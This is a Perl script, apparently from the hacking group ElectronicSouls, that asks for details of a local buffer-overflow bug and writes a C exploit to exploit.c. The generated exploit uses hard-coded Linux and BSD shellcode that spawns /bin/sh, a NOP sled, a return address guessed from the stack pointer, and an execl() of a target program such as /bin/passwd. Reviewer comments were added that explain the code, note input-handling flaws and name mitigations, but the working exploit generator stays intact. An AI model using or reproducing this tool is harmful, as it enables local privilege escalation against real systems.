#!/usr/bin/perl
#
# [ElectronicSouls]
#
# Hrm.... well this is quite simple, this little proggie of mine lets the user submit
# information thru short questions about their local buffer overflow bug and with that,
# the program generates a .c proof of concept exploit code for it.
# Enjoy!
#
# -BuRn-X
#
#
# Startup banner, written verbatim to STDOUT. A single-quoted heredoc is used
# so nothing inside the box is interpolated.
print <<'BANNER';
+++++++++++++++++++++++++++++++++++++++
+           [ElectronicSouls]         +
+               Presents              +
+               -+-+-+-+-             +
+           Simple Bof Coder          +
+             Linux && BSD            +
+           (Public Version)          +
+               By BuRn-X             +
+++++++++++++++++++++++++++++++++++++++
BANNER

# Interactive questionnaire. Each answer is read as one line from STDIN, has
# its trailing newline removed, and is stored in a package global that the
# rest of the script interpolates into the generated C source.
#
# None of the answers is validated: the numeric fields are not checked to be
# numbers, and the path/name/option strings are later placed inside C string
# literals without any escaping.
my $ask = sub {
    my ($question) = @_;
    print $question;
    my $answer = <STDIN>;
    chomp $answer;
    return $answer;
};

# Path and argv[0] of the program the generated code will execl().
$proglocation = $ask->("Enter the Program Location(Ex. /bin/passwd):\n");
$progname     = $ask->("Enter the Program Name(Ex. passwd):\n");

# Values that become the BSIZE / OFFSET / ALIGN #defines; an empty offset
# or align answer is mapped to 0 further down.
$buffsize   = $ask->("Enter the buffer size:\n");
$offsetsize = $ask->("Please the Offset(Default = 0, leave blank for default):\n");
$myalign    = $ask->("Enter the Align(Default = 0, leave blank for 0):\n");

# Optional extra argument, and the selector for which payload is emitted
# (compared against the exact strings "linux" and "bsd").
$exoption = $ask->("Any Option for appplication(Ex. -m), Leave blank for none:\n");
$typeos   = $ask->("What type of OS(Linux=linux, BSD=bsd):\n");

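# Open the output file in the current directory in append mode.
#
# Changes from the original: the three-argument form of open() is used so the
# mode can never be confused with the file name, and a failed open now stops
# the script instead of letting every later print silently go nowhere.
# The bareword handle name is kept because the rest of the script prints to it.
#
# NOTE(review): append mode means an existing exploit.c (including a symlink
# of that name in a shared directory) is written to rather than replaced, and
# a second run adds a second copy of the program to the same file.
open(esouls, '>>', 'exploit.c')
    or die "Cannot open exploit.c for appending: $!\n";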

# Head of the generated C file: three #include lines followed by the BSIZE,
# ALIGN and OFFSET macros. A blank answer for align or offset becomes 0; any
# other answer is copied into the #define exactly as typed (no numeric check).
my $align_define  = ($myalign    eq "") ? 0 : $myalign;
my $offset_define = ($offsetsize eq "") ? 0 : $offsetsize;

print esouls "\n#include <stdio.h>\n",
             "#include <unistd.h>\n",
             "#include <stdlib.h>\n",
             "#define BSIZE $buffsize \n";
print esouls "\n#define ALIGN $align_define \n";
print esouls "\n#define OFFSET $offset_define //offset \n";
# Emit the declaration of the payload array, then one of two hard-coded byte
# strings chosen by an exact, case-sensitive match on $typeos.
# NOTE(review): when $typeos is neither "linux" nor "bsd" nothing is written
# after "esshellcode[] =", so the generated file has a declaration with no
# initializer; the answer is never checked against the two accepted values.
print esouls"
unsigned char esshellcode[] =\n";
# Payload written for "linux". The bytes are treated as opaque here. Both this
# and the BSD payload contain \xcd\x80 (the x86 encoding of int 0x80) and the
# literal string /bin/sh, which are the kind of fixed content a defender can
# match on when looking for files produced by this generator.
if ( $typeos eq "linux" ) {
print esouls "\"\\xeb\\x16\\x31\\xdb\\x31\\xc9\\xf7\\xe1\"\n";
print esouls "\"\\x5b\\xb0\\x0b\\x88\\x53\\x07\\x52\\x53\"\n";
print esouls "\"\\x89\\xe1\\xcd\\x80\\xb0\\x01\\xcd\\x80\"\n";
print esouls "\"\\xe8\\xe5\\xff\\xff\\xff/bin/sh\";\n";
}
# Payload written for "bsd"; longer than the Linux one, not decoded here.
if ( $typeos eq "bsd" ) {
print esouls  "\"\\x31\\xdb\\xb8\\xb7\\xaa\\xaa\\xaa\\x25\\xb7\\x55\\x55\\x55\\x53\\x53\\xcd\\x80\"\n";
print esouls  "\"\\x31\\xdb\\xb8\\x17\\xaa\\xaa\\xaa\\x25\\x17\\x55\\x55\\x55\\x53\\x53\\xcd\\x80\"\n";
print esouls  "\"\\xeb\\x23\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x31\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\"\n";
print esouls  "\"\\x89\\x56\\x14\\x88\\x56\\x19\\x31\\xc0\\xb0\\x3b\\x8d\\x4e\\x0b\\x89\\xca\\x52\"\n";
print esouls  "\"\\x51\\x53\\x50\\xeb\\x18\\xe8\\xd8\\xff\\xff\\xff/bin/sh\\x01\\x01\\x01\\x01\"\n";
print esouls  "\"\\x02\\x02\\x02\\x02\\x03\\x03\\x03\\x03\\x9a\\x04\\x04\\x04\\x04\\x07\\x04\";\n";
}
# Emit get_sp() and the first part of main() of the generated C program as one
# multi-line double-quoted string. Inside it, \" yields a literal quote, and
# the backslashes in "\int" and "\if" are simply dropped by Perl, so the file
# receives "int argc" and "if(argc > 1)".
#
# What the emitted C does, as written below:
#   - get_sp() copies %esp into %eax with inline asm (32-bit x86 register
#     names) and has no return statement of its own.
#   - main() takes its buffer size from BSIZE, or from argv[1] via atoi(), and
#     allocates that many bytes; the malloc() result is not checked.
#   - The buffer is zeroed, then filled with 0x90 bytes.
#   - get_sp() - offset is stored at buffer[bsize - 4] and buffer[bsize - 8].
#   - esshellcode is copied in just before those two slots, shifted by align.
#
# Defender note: the address written into the buffer is derived from this
# process's own stack pointer and the payload sits in the argument itself, so
# the approach appears to depend on a predictable stack layout and an
# executable stack in the target. Address-space layout randomisation,
# non-executable stacks and compiler stack protectors are the standard
# mitigations for this class of bug.
print esouls  "	
unsigned long get_sp(void) {
   __asm__(\"movl %esp, %eax\");
}

int main(\int argc, char **argv) {
   char *buffer;
   int i;
   int bsize = BSIZE;
   int align = ALIGN;
   int offset = OFFSET;
   unsigned long addr;

   \if(argc > 1) bsize = atoi(argv[1]);

   buffer = (char *)malloc(bsize);

   bzero(buffer, bsize);
   memset(buffer, 0x90, bsize);

   addr = get_sp() - offset;

   *(unsigned long *)&buffer[bsize - 4] = addr;
   *(unsigned long *)&buffer[bsize - 8] = addr;

   memcpy(buffer + bsize - 8 - align - strlen(esshellcode), esshellcode, strlen(esshellcode));\n";

# Final statement written to the generated file: an execl() of the chosen
# program with the prepared buffer as an argument. When the operator supplied
# an option string it is inserted as an extra argument before the buffer.
#
# The three answers are dropped between C double quotes exactly as typed; a
# quote or backslash in any of them ends up unescaped in the generated source.
my $exec_call = ($exoption eq "")
    ? qq{execl("$proglocation", "$progname", buffer, NULL);\n}
    : qq{execl("$proglocation", "$progname", "$exoption", buffer, NULL); \n};
print esouls $exec_call;
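# Flush and close the output file. Buffered write errors (full disk, revoked
# permissions) only surface here, so the result is checked and a failure is
# reported instead of leaving a silently truncated file behind.
close(esouls)
    or die "Error while closing exploit.c: $!\n";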